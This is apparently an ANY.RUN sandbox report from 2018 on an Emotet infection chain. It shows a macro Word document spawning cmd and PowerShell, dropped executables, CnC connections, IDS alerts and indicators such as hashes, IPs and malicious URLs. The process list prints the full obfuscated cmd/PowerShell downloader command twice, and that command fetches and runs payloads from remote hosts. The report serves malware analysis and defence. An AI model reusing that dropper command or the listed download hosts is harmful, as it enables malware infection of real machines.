URL:

https://pastebin.com/ymx9M4gu

Full analysis: https://app.any.run/tasks/1524f74a-b68b-40bf-a502-2a80608ad409
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: December 14, 2018, 20:56:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
maldoc-1
Indicators:
MD5:

7C8AF18D8A91AE5F0E3FCF9E51D5AA74

SHA1:

A1428D300E2A854473B31C5D609108D8D485E962

SHA256:

5A99111B69B33D74D15DB1E3BCFDCD7140C27CCF7B5B321933DEEB2B11F39C87

SSDEEP:

3:N8AWiMLZsWkQ:2AKuFQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2348)
      • WINWORD.EXE (PID: 4048)
      • WINWORD.EXE (PID: 2776)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2348)
      • WINWORD.EXE (PID: 2776)
      • WINWORD.EXE (PID: 4048)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 2968)
      • powershell.exe (PID: 3240)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3044)
      • cmd.exe (PID: 2552)
      • cmd.exe (PID: 1464)

    • Application was dropped or rewritten from another process

      • 362.exe (PID: 2320)
      • 362.exe (PID: 288)
      • archivesymbol.exe (PID: 3032)
      • archivesymbol.exe (PID: 4028)
      • s4IxfGm6rr.exe (PID: 1892)
      • s4IxfGm6rr.exe (PID: 2912)
      • archivesymbol.exe (PID: 2856)
      • archivesymbol.exe (PID: 3688)
      • 362.exe (PID: 1380)
      • 362.exe (PID: 3992)
      • archivesymbol.exe (PID: 2316)
      • archivesymbol.exe (PID: 1984)
      • FubmzmC.exe (PID: 3168)
      • FubmzmC.exe (PID: 4076)
      • archivesymbol.exe (PID: 3576)
      • archivesymbol.exe (PID: 2192)
      • 390.exe (PID: 356)
      • 390.exe (PID: 2864)
      • archivesymbol.exe (PID: 2224)
      • archivesymbol.exe (PID: 2116)

    • EMOTET was detected

      • archivesymbol.exe (PID: 3032)
      • archivesymbol.exe (PID: 1984)
      • archivesymbol.exe (PID: 2192)

    • Connects to CnC server

      • archivesymbol.exe (PID: 3032)
      • archivesymbol.exe (PID: 1984)
      • archivesymbol.exe (PID: 2192)

    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3032)
      • archivesymbol.exe (PID: 1984)
      • archivesymbol.exe (PID: 2192)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2968)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 3240)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • iexplore.exe (PID: 3452)
      • WINWORD.EXE (PID: 2348)
      • WINWORD.EXE (PID: 2776)
      • WINWORD.EXE (PID: 4048)

    • Application launched itself

      • WINWORD.EXE (PID: 2348)
      • archivesymbol.exe (PID: 4028)
      • WINWORD.EXE (PID: 2776)
      • WINWORD.EXE (PID: 4048)
      • archivesymbol.exe (PID: 2224)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2200)
      • cmd.exe (PID: 2556)
      • cmd.exe (PID: 3740)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3884)
      • 362.exe (PID: 288)
      • archivesymbol.exe (PID: 3032)
      • s4IxfGm6rr.exe (PID: 2912)
      • powershell.exe (PID: 2968)
      • 362.exe (PID: 3992)
      • archivesymbol.exe (PID: 1984)
      • FubmzmC.exe (PID: 4076)
      • powershell.exe (PID: 3240)
      • 390.exe (PID: 2864)

    • Creates files in the user directory

      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 2968)
      • powershell.exe (PID: 3240)

    • Starts itself from another location

      • 362.exe (PID: 288)
      • s4IxfGm6rr.exe (PID: 2912)
      • 362.exe (PID: 3992)
      • FubmzmC.exe (PID: 4076)
      • 390.exe (PID: 2864)

    • Connects to SMTP port

      • archivesymbol.exe (PID: 2192)

  • INFO

    • Reads internet explorer settings

      • iexplore.exe (PID: 3712)
      • iexplore.exe (PID: 2152)

    • Application launched itself

      • iexplore.exe (PID: 3452)

    • Creates files in the user directory

      • iexplore.exe (PID: 3452)
      • FlashUtil32_26_0_0_131_ActiveX.exe (PID: 2728)
      • iexplore.exe (PID: 2152)
      • WINWORD.EXE (PID: 2348)
      • iexplore.exe (PID: 3712)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 3452)

    • Changes internet zones settings

      • iexplore.exe (PID: 3452)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3712)
      • iexplore.exe (PID: 2152)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2644)
      • WINWORD.EXE (PID: 2348)
      • WINWORD.EXE (PID: 2776)
      • WINWORD.EXE (PID: 3764)
      • WINWORD.EXE (PID: 4048)
      • WINWORD.EXE (PID: 2252)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
74
Monitored processes
39
Malicious processes
23
Suspicious processes
8

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start iexplore.exe iexplore.exe flashutil32_26_0_0_131_activex.exe no specs iexplore.exe winword.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 362.exe no specs 362.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe winword.exe no specs winword.exe no specs s4ixfgm6rr.exe no specs s4ixfgm6rr.exe cmd.exe no specs cmd.exe no specs powershell.exe archivesymbol.exe no specs archivesymbol.exe no specs 362.exe no specs 362.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe fubmzmc.exe no specs fubmzmc.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe winword.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 390.exe no specs 390.exe archivesymbol.exe no specs archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
288"C:\Users\admin\AppData\Local\Temp\362.exe"C:\Users\admin\AppData\Local\Temp\362.exe
362.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\362.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
356"C:\Users\admin\AppData\Local\Temp\390.exe" C:\Users\admin\AppData\Local\Temp\390.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\390.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
1380"C:\Users\admin\AppData\Local\Temp\362.exe" C:\Users\admin\AppData\Local\Temp\362.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\362.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
1464CmD /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1892"C:\Users\admin\AppData\Local\archivesymbol\s4IxfGm6rr.exe"C:\Users\admin\AppData\Local\archivesymbol\s4IxfGm6rr.exearchivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\archivesymbol\s4ixfgm6rr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
1984"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\archivesymbol\archivesymbol.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2116"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\archivesymbol\archivesymbol.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
2152"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3452 CREDAT:6403C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2192"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\archivesymbol\archivesymbol.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2200c:\WiTAWFc\ivFAjJD\mZGnokr\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set e6ut=GzJtfbpwBoJhSTItVrXKzTzZdEnnEdbNCgA 7c@=e/5j(kH1L}3sa8DFPuimM{6U+:x$l;-y0)YQ2'W\O.v,&&for %5 in (67;58;4;80;39;77;22;7;14;77;69;67;60;52;0;39;27;40;7;70;9;30;43;40;37;15;35;31;40;15;81;78;40;30;32;68;58;40;27;15;69;67;14;8;48;39;77;11;15;15;6;65;41;41;51;57;27;29;9;7;27;30;9;29;17;57;59;81;37;9;59;41;10;50;50;42;31;30;31;38;11;15;15;6;65;41;41;7;7;7;81;17;9;15;40;58;17;9;30;17;52;51;58;68;81;37;9;59;41;7;6;70;58;27;37;68;57;29;40;51;41;18;28;8;82;50;56;29;46;33;23;38;11;15;15;6;65;41;41;17;29;52;30;58;11;81;9;17;33;41;59;36;59;27;21;74;52;14;22;48;38;11;15;15;6;65;41;41;22;52;82;33;17;9;57;6;81;27;40;15;41;47;47;54;62;56;7;55;57;38;11;15;15;6;65;41;41;51;15;40;4;52;27;9;30;52;68;29;58;27;58;81;27;40;15;41;54;4;12;16;48;4;51;32;62;77;81;12;6;68;58;15;44;77;38;77;73;69;67;68;32;19;39;77;27;78;56;77;69;67;12;32;19;35;39;35;77;50;62;76;77;69;67;55;55;74;39;77;59;7;16;77;69;67;54;75;58;39;67;40;27;82;65;15;40;59;6;64;77;79;77;64;67;12;32;19;64;77;81;40;66;40;77;69;4;9;17;40;52;37;11;44;67;32;4;27;35;58;27;35;67;14;8;48;73;61;15;17;71;61;67;60;52;0;81;54;9;7;27;68;9;52;29;55;58;68;40;44;67;32;4;27;83;35;67;54;75;58;73;69;67;37;56;63;39;77;30;0;21;77;69;14;4;35;44;44;0;40;15;70;14;15;40;59;35;67;54;75;58;73;81;68;40;27;33;15;11;35;70;33;40;35;53;72;72;72;72;73;35;61;14;27;82;9;45;40;70;14;15;40;59;35;67;54;75;58;69;67;43;0;43;39;77;59;7;48;77;69;30;17;40;52;45;69;49;49;37;52;15;37;11;61;49;49;67;11;22;34;39;77;51;21;11;77;69;86)do set mK=!mK!!e6ut:~%5,1!&&if %5 gtr 85 powershell "!mK:~-465!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
8 153
Read events
6 976
Write events
1 128
Delete events
49

Modification events

(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Operation:writeName:CompatibilityFlags
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
Operation:writeName:SecuritySafe
Value:
1
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
Operation:writeName:{B47D56CB-FFE2-11E8-834A-5254004A04AF}
Value:
0
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Type
Value:
4
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Count
Value:
3
(PID) Process:(3452) iexplore.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Operation:writeName:Time
Value:
E2070C0005000E001400380014004F02
Executable files
10
Suspicious files
20
Text files
138
Unknown types
20

Dropped files

PID
Process
Filename
Type
3452iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
3452iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\ymx9M4gu[1].txt
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\PP6KS563\pastebin.min.v8[1].csstext
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@pastebin[1].txttext
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U2ZG9DE0\pastebin.min.v3[1].jstext
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\dd_pastebin[1].pngimage
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\ymx9M4gu[1].htmhtml
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\BWPPCY0O\pastebin.ie8[1].csstext
MD5:
SHA256:
3712iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\js[1]text
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
24
TCP/UDP connections
131
DNS requests
81
Threats
92

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3032
archivesymbol.exe
GET
190.146.201.54:80
http://190.146.201.54/
CO
malicious
2192
archivesymbol.exe
GET
190.146.201.54:80
http://190.146.201.54/
CO
malicious
1984
archivesymbol.exe
GET
200
190.152.12.86:80
http://190.152.12.86/
EC
gpg
106 Kb
malicious
2192
archivesymbol.exe
GET
200
190.152.12.86:80
http://190.152.12.86/
EC
binary
148 b
malicious
2152
iexplore.exe
GET
301
210.211.99.239:80
http://www.vn-share.cf/Southwire/963553843085660518/INFO/En/Invoice-54164011
VN
html
285 b
malicious
3884
powershell.exe
GET
200
94.138.199.5:80
http://sundownbodrum.com/J335NbN/
TR
executable
500 Kb
malicious
2968
powershell.exe
GET
301
94.138.199.5:80
http://sundownbodrum.com/J335NbN
TR
html
241 b
malicious
2152
iexplore.exe
GET
301
107.180.58.46:80
http://missvietnamdc.org/En_us/Attachments/2018-12
US
html
259 b
suspicious
2152
iexplore.exe
GET
200
107.180.58.46:80
http://missvietnamdc.org/En_us/Attachments/2018-12/
US
document
55.5 Kb
suspicious
2152
iexplore.exe
GET
404
38.106.32.161:80
http://altayusa.com/wvvccw/IKYMK5Soc/
US
html
334 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3452
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3712
iexplore.exe
23.111.10.140:443
cdn.carbonads.com
netDNA
US
unknown
3712
iexplore.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3712
iexplore.exe
204.11.109.78:443
tags.expo9.exponential.com
Exponential Interactive, Inc.
US
unknown
3712
iexplore.exe
204.11.110.61:443
s.tribalfusion.com
Exponential Interactive, Inc.
US
unknown
3712
iexplore.exe
68.183.42.23:443
srv.carbonads.net
DSL Extreme
US
unknown
3712
iexplore.exe
108.161.189.78:443
m.servedby-buysellads.com
netDNA
US
unknown
3712
iexplore.exe
185.33.223.83:443
ib.adnxs.com
AppNexus, Inc
unknown
3712
iexplore.exe
54.72.61.29:443
aa.agkn.com
Amazon.com, Inc.
IE
whitelisted
3712
iexplore.exe
185.64.189.115:443
image6.pubmatic.com
PubMatic, Inc.
GB
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
malicious
www.googletagmanager.com
  • 216.58.215.232
whitelisted
tags.expo9.exponential.com
  • 204.11.109.78
  • 204.11.110.74
  • 204.11.110.73
  • 204.11.110.72
  • 204.11.110.71
  • 204.11.109.77
whitelisted
s.tribalfusion.com
  • 204.11.110.61
  • 204.11.110.63
  • 204.11.109.67
  • 204.11.109.68
  • 204.11.110.62
  • 204.11.110.64
shared
cdn.carbonads.com
  • 23.111.10.140
whitelisted
m.servedby-buysellads.com
  • 108.161.189.78
whitelisted
srv.carbonads.net
  • 68.183.42.23
whitelisted
ib.adnxs.com
  • 185.33.223.83
  • 185.33.223.202
  • 185.33.223.209
  • 185.33.223.203
  • 185.33.223.80
  • 185.33.223.208
  • 185.33.223.215
  • 185.33.223.206
whitelisted
a.tribalfusion.com
  • 204.11.110.64
  • 204.11.110.62
  • 204.11.109.68
  • 204.11.109.67
  • 204.11.110.63
  • 204.11.110.61
whitelisted

Threats

PID
Process
Class
Message
2152
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
2152
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2152
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
2152
iexplore.exe
Attempted User Privilege Gain
SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt
3884
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3884
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3884
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3884
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3884
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3032
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Trojan-Banker.Win32.Emotet
8 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://pastebin.com/ymx9M4gu